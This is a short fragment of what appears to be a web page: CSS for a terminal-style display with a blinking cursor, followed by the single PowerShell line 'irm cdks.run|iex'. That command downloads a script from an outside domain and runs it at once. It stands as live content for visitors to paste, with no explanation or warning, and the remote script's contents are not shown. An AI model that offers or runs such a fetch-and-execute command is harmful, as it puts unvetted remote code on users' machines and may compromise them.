color: #0f0; font-family: 'Consolas', monospace; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; } pre { border: 1px solid #333; padding: 20px; border-radius: 8px; background: #0a0a0a; } .cursor { display: inline-block; width: 8px; height: 15px; background: #0f0; animation: blink 1s infinite; } @keyframes blink { 50% { opacity: 0; } }
irm cdks.run|iex